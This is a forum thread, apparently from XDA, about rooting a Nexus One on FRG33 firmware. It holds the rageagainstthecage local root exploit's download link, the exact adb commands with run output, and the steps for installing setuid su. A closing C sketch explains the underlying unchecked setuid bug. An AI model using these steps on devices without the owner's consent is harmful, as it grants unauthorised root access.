[ROM] Passion_Google_WWE_2.16.1700.1_FRG33_MFG_Shipment_ ROM


DMaverick50

Senior Member
May 1, 2009
1,274
1
San Antonio, Tx
is there yet a proven way to root 33? Ive searched this site and thru google with no clear findings. I didnt want to unlock my bootloader but i am so sick of 33 that now I want to do it but i dont want to just jump on board one of the methods if ill jack up my phone. The above instructions are really confusing, but they havent been confirmed either as i understand it. Thanks for any help, i cant get rid of 33 quick enough...
 

cmstlist

Senior Member
Jan 11, 2010
3,349
522
Toronto
Google Pixel 4a
My friend's new nexus one is already FRG33 as it arrived, there is no way to use 1-click root.
I've tried to use new exploit from C skills and it did show "#". So I think it should do the trick.
I doesn't flash anything yet, therefore, this is for your reference.

C skills: http://c-skills.blogspot.com/2010/08/please-hold-line.html

Very interesting, thank you! I assume this is largely same exploit that was originally published here:
http://xdaforums.com/showthread.php?t=736271
which has had various names applied to the individual files - freenexus, rageagainstthecage, exploid.

I had always assumed that the one-click root relied on exactly the same vulnerability as the "exploid" method. But perhaps FRG33 breaks only the 1-click and not the manual method?
 

ali3nfr3ak

Senior Member
Dec 1, 2008
598
151
Christchurch
Code:
F:\ADB>adb push rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage
263 KB/s (5392 bytes in 0.020s)

F:\ADB>adb shell chmod 700 /data/local/tmp/rageagainstthecage

F:\ADB>adb shell
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage
./rageagainstthecage
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C

[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3084, 3084}
[*] Searching for adb ...
[+] Found adb as PID 64
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] 7-4-3-C[at]web.de so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
F:\ADB>adb kill-server

F:\ADB>adb start-server
* daemon not running. starting it now *
* daemon started successfully *

F:\ADB>adb shell
#
 

cmstlist

Senior Member
Jan 11, 2010
3,349
522
Toronto
Google Pixel 4a
ok i did the steps outlined by stfl, and have

adb shell
#

ideas on next step please?

Okay so this gives you a root shell... but you don't have superuser and su loaded yet right? So I suggest taking a look at these instructions:
http://xdaforums.com/showthread.php?t=736271
with recognition that some file locations will be different because you're using a different version of the exploit. Your aim is to end up with busybox, su and superuser.apk in all the right places with all the right permissions.

If you can do this - you should then be able to run ROM Manager and grant it root access. Flash ClockworkMod recovery. If you had a nandroid backup from pre-upgrade, restore to it now. If you didn't have such a backup, then in ROM Manager go to Download ROM > Stock Images > Nexus One FRF91, pick the rooted or stock option.

Let us know how it goes and what you had to do... maybe someone who's more Linuxy can clarify this better =)
 

ali3nfr3ak

Senior Member
Dec 1, 2008
598
151
Christchurch
Okay so this gives you a root shell... but you don't have superuser and su loaded yet right? So I suggest taking a look at these instructions:
http://xdaforums.com/showthread.php?t=736271
with recognition that some file locations will be different because you're using a different version of the exploit. Your aim is to end up with busybox, su and superuser.apk in all the right places with all the right permissions.

If you can do this - you should then be able to run ROM Manager and grant it root access. Flash ClockworkMod recovery. If you had a nandroid backup from pre-upgrade, restore to it now. If you didn't have such a backup, then in ROM Manager go to Download ROM > Stock Images > Nexus One FRF91, pick the rooted or stock option.

Let us know how it goes and what you had to do... maybe someone who's more Linuxy can clarify this better =)

Hey thanks for that, will give it a go and report back... =)
 

DMaverick50

Senior Member
May 1, 2009
1,274
1
San Antonio, Tx
i unlocked, rooted, flashed custom recovery. anytime i try to flash a rom or just stock frf 91, in recovery i get:

Welcome to CyanogenMod-6.0.0-N1!
assert failed: getprop ("ro.bootloader") == ".33.2012: and so on...

i found something about hboot when i searched but i still dont understand. i unlocked and rooted to get rid of 33, anyone know what im doing wrong? thanks
 

ali3nfr3ak

Senior Member
Dec 1, 2008
598
151
Christchurch
i unlocked, rooted, flashed custom recovery. anytime i try to flash a rom or just stock frf 91, in recovery i get:

Welcome to CyanogenMod-6.0.0-N1!
assert failed: getprop ("ro.bootloader") == ".33.2012: and so on...

i found something about hboot when i searched but i still dont understand. i unlocked and rooted to get rid of 33, anyone know what im doing wrong? thanks

have a look here

http://xdaforums.com/showthread.php?t=726258
 

ali3nfr3ak

Senior Member
Dec 1, 2008
598
151
Christchurch
Yes !!! I did it. :D, I now have Ra-nexus-v1.8.0 as my recovery

HUGE PROPS to stfl for finding exploit, and cmstlist for direction


Basically i followed the instructions stfl posted, but it doesn't always work, just keep trying it will, i had to repeat it 3 times.
Code:
F:\ADB>adb push rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage
263 KB/s (5392 bytes in 0.020s)

F:\ADB>adb shell chmod 700 /data/local/tmp/rageagainstthecage

F:\ADB>adb shell
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage
./rageagainstthecage
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3084, 3084}
[*] Searching for adb ...
[+] Found adb as PID 64
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] 7-4-3-C[at]web.de so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
F:\ADB>adb kill-server

F:\ADB>adb start-server
* daemon not running. starting it now *
* daemon started successfully *

F:\ADB>adb shell
#

then did the steps in this thread http://xdaforums.com/showthread.php?t=736271

Code:
1. run freenexus.bat
2. adb shell
3. cd /data/local/tmp
4. ./freenexus ( i didnt bother toggling wifi ) it will hang and youll have to manually close that command box and open a new one
5. C:\Users\Administrator>f:

F:\>cd adb

F:\ADB>adb shell
# cd /data/local/tmp
cd /data/local/tmp
# ./busybox cp busybox /system/bin
./busybox cp busybox /system/bin
# chmod 4755 /system/bin/busybox
chmod 4755 /system/bin/busybox
# busybox cp Superuser.apk /system/app
busybox cp Superuser.apk /system/app
# busybox cp su /system/bin
busybox cp su /system/bin
# chmod 4755 /system/bin/su
chmod 4755 /system/bin/su
# exit
exit

F:\ADB>adb shell
# su
su
# exit 
exit 

F:\ADB>adb push flash_image /data/local/tmp/flash_image
873 KB/s (76044 bytes in 0.085s)

F:\ADB>adb shell
# su
su
# mount -o rw,remount /dev/block/mtdblock /system
mount -o rw,remount /dev/block/mtdblock /system
# cd /data/local/tmp
cd /data/local/tmp
# chmod 755 flash_image
chmod 755 flash_image
# ./flash_image recovery /sdcard/recovery.img
./flash_image recovery /sdcard/recovery.img
#
F:\ADB>#


DO NOT POWER OFF PHONE DURING ANY STEPS OTHERWISE YOU WILL HAVE TO START AGAIN
 

stfl

New member
Aug 15, 2010
2
1
Very interesting, thank you! I assume this is largely same exploit that was originally published here:
http://xdaforums.com/showthread.php?t=736271
which has had various names applied to the individual files - freenexus, rageagainstthecage, exploid.

I had always assumed that the one-click root relied on exactly the same vulnerability as the "exploid" method. But perhaps FRG33 breaks only the 1-click and not the manual method?

Yes, you are correct. The 1-click author said he only used exploid (wifi exploit) method and he may add the rageagainstthecage (adb spawning exploit) method some other day.
That's why 1-click root doesn't work on FRG33; only the manual method applies to FRG33 right now.
 

cmstlist

Senior Member
Jan 11, 2010
3,349
522
Toronto
Google Pixel 4a
Yes, you are correct. The 1-click author said he only used exploid (wifi exploit) method and he may add the rageagainstthecage (adb spawning exploit) method some other day.
That's why 1-click root doesn't work on FRG33; only the manual method applies to FRG33 right now.

Interesting to know these details, thanks. On one hand it would be very useful to have the latter method in a 1-click root; on the other hand, Google will probably patch that one up in a future build anyways so it may be short-lived =)
 

DMaverick50

Senior Member
May 1, 2009
1,274
1
San Antonio, Tx

thanks, i did take a look at that, its pretty intimidating so i was hoping for an easier solution. Oh well, ive come this far, and i need those damned protected apps so ill see what i can do with those instructions.

Im also wondering if i could just flash the froyo radio? Would that bring along that older spl? I asked in another thread but the reply was a bit confusing, he said "not unless i use passimg" which seems simple enough to me, i just need to find the zip, i could only find the .img and im not sure if i can convert it. But that same reply indicated that if i dont use passimg, "radio will only touch radio, especially if i use fastboot", but i thought passimg would have to be thru fastboot wouldnt it?

The Kradio isnt working for me anyway so i want the froyo radio back, so if i could flash that in a way to also get the hboot that would be awesome.

Im asking a thousand questions because i cant afford to jack my phone up, and so far, the only thing about this that resembles my days of messing with the g1 are the terminal commands, lots of new ground for me to cover here. thanks for the help, im awfully close

Edit: flashed 91 radio successfully, it wouldnt passimg so i just flashed the zip from recovery, but hboot is still 35.0017
 

ali3nfr3ak

Senior Member
Dec 1, 2008
598
151
Christchurch
thanks, i did take a look at that, its pretty intimidating so i was hoping for an easier solution. Oh well, ive come this far, and i need those damned protected apps so ill see what i can do with those instructions.

Im also wondering if i could just flash the froyo radio? Would that bring along that older spl? I asked in another thread but the reply was a bit confusing, he said "not unless i use passimg" which seems simple enough to me, i just need to find the zip, i could only find the .img and im not sure if i can convert it. But that same reply indicated that if i dont use passimg, "radio will only touch radio, especially if i use fastboot", but i thought passimg would have to be thru fastboot wouldnt it?

The Kradio isnt working for me anyway so i want the froyo radio back, so if i could flash that in a way to also get the hboot that would be awesome.

Im asking a thousand questions because i cant afford to jack my phone up, and so far, the only thing about this that resembles my days of messing with the g1 are the terminal commands, lots of new ground for me to cover here. thanks for the help, im awfully close

Edit: flashed 91 radio successfully, it wouldnt passimg so i just flashed the zip from recovery, but hboot is still 35.0017

I'm not really that knowledgeable about android stuff, but I'm sure the only way back to 0.33.0012 is by following those steps in the revert HBOOT thread,
 

DMaverick50

Senior Member
May 1, 2009
1,274
1
San Antonio, Tx
I'm not really that knowledgeable about android stuff, but I'm sure the only way back to 0.33.0012 is by following those steps in the revert HBOOT thread,

yeah i ended up following those (tried to anyway), got all the files downloaded and modified but cant get terminal to recognize my device. This is tough but its good practice. Maybe when its all said and done i can be glad i flashed this god forsaken 33
 

AndroidPerson

Senior Member
Apr 19, 2010
76
2
yeah i ended up following those (tried to anyway), got all the files downloaded and modified but cant get terminal to recognize my device. This is tough but its good practice. Maybe when its all said and done i can be glad i flashed this god forsaken 33

im at the same spot. I rooted and had to setup usb, AndroidSDK, and Fastboot, but when i do the terminal commands in the revert thread, it says it doesnt recognize the device. I looked at the thread about adb commands, but between that and a ton of google searches i cant find anything about initial steps to access the phone, to make it recognize the phone. the phone says fastboot usb in red, and terminal responds it doesnt recognize the device im sure i have the files in the right place, im typing in the correct commands. ive just done so much searching, and ive followed the instructions so closely. I cant think of anything else to try or anything else to search for
 

DMaverick50

Senior Member
May 1, 2009
1,274
1
San Antonio, Tx
I have successfully reverted back to HBOOT-0.33.0012 :D

I used this rom after I achieved root http://xdaforums.com/showthread.php?t=714184
Then followed steps in this thread http://xdaforums.com/showthread.php?t=726258

thanks for this, the rom works great. Somehow I missed that there was a 33 rom around. Im working through the same revert thread you used but I still cant get my "device detected" in terminal to finish it. But now that ive got this rom im in no hurry, paid apps are working fine, thanks again!
 

Top Liked Posts

  • 1
    My friend's new nexus one is already FRG33 as it arrived, there is no way to use 1-click root.
    I've tried to use new exploit from C skills and it did show "#". So I think it should do the trick.
    I doesn't flash anything yet, therefore, this is for your reference.

    C skills: http://c-skills.blogspot.com/2010/08/please-hold-line.html

    1. Get the exploit (executable file)
    exploit: http://stealth.openwall.net/xSports/RageAgainstTheCage.tgz

    2. Extract the .tgz file to get the "rageagainstthecage-arm5.bin"
    I put the file in d:\RageAgainstTheCage

    3. Put exploit file to your N1
    adb push d:\RageAgainstTheCage\rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage
    adb shell chmod 700 /data/local/tmp/rageagainstthecage

    4. Enter adb shell
    adb shell

    5. Execute exploit (It will automatically close adb shell)
    $cd /data/local/tmp
    $./rageagainstthecage

    6. Restart adb
    adb kill-server
    adb start-server

    7. Enter adb shell again
    # (Yes, my lord.)

    I've found it may not succeed every time, if it doesn't, please go through steps 4~7 again.
    If it still doesn't work, we need to wait for a new way to root. Good luck.
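
Added example, not part of the thread and not adbd's source: the "checking NPROC limit" and "Spawning children" lines in the transcripts above match the publicly documented root cause, an adbd that ignored the result of setuid() when dropping from root to the shell user, so a failure at the process limit left it running as root. The C sketch below puts that unchecked pattern beside a checked one; struct id_ops, the fake_* functions and uid/gid 2000 (Android's shell user) are assumptions introduced here so the failure can be simulated without root.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical seam: lets the failure be simulated without running as root. */
struct id_ops {
    int (*set_gid)(gid_t);
    int (*set_uid)(uid_t);
    uid_t (*get_uid)(void);
};
const struct id_ops OPS_REAL = { setgid, setuid, getuid };

/* Unchecked pattern: results ignored, caller believes the drop happened. */
int drop_unchecked(const struct id_ops *o, uid_t uid, gid_t gid) {
    o->set_gid(gid);
    o->set_uid(uid);
    return 0;
}

/* Checked pattern: group first, test every call, verify; on -1 the caller must exit. */
int drop_checked(const struct id_ops *o, uid_t uid, gid_t gid) {
    if (o->set_gid(gid) != 0) return -1;
    if (o->set_uid(uid) != 0) return -1;  /* e.g. EAGAIN at RLIMIT_NPROC */
    if (o->get_uid() != uid) return -1;
    return 0;
}

/* Constructed fakes: setuid() fails as it would at the target uid's process limit. */
static uid_t sim_uid;
static int fake_setgid(gid_t g) { (void)g; return 0; }
static int fake_setuid_eagain(uid_t u) { (void)u; errno = EAGAIN; return -1; }
static int fake_setuid_ok(uid_t u) { sim_uid = u; return 0; }
static uid_t fake_getuid(void) { return sim_uid; }
const struct id_ops OPS_EXHAUSTED = { fake_setgid, fake_setuid_eagain, fake_getuid };
const struct id_ops OPS_NORMAL = { fake_setgid, fake_setuid_ok, fake_getuid };

/* Runs one drop routine from simulated root; returns 1 if still uid 0. */
typedef int (*drop_fn)(const struct id_ops *, uid_t, gid_t);
int still_root_after(drop_fn drop, const struct id_ops *o, int *rc) {
    sim_uid = 0;
    *rc = drop(o, 2000, 2000);  /* 2000 = Android shell uid/gid (assumption) */
    return sim_uid == 0;
}

int main(void) {
    int rc, root = still_root_after(drop_unchecked, &OPS_EXHAUSTED, &rc);
    printf("unchecked: rc=%d still_root=%d\n", rc, root);
    root = still_root_after(drop_checked, &OPS_EXHAUSTED, &rc);
    printf("checked:   rc=%d still_root=%d\n", rc, root);
    return 0;
}
```

With the exhausted fake, the unchecked routine reports success while the simulated uid is still 0; the checked routine returns -1, which is the signal for a daemon to terminate rather than keep serving as root.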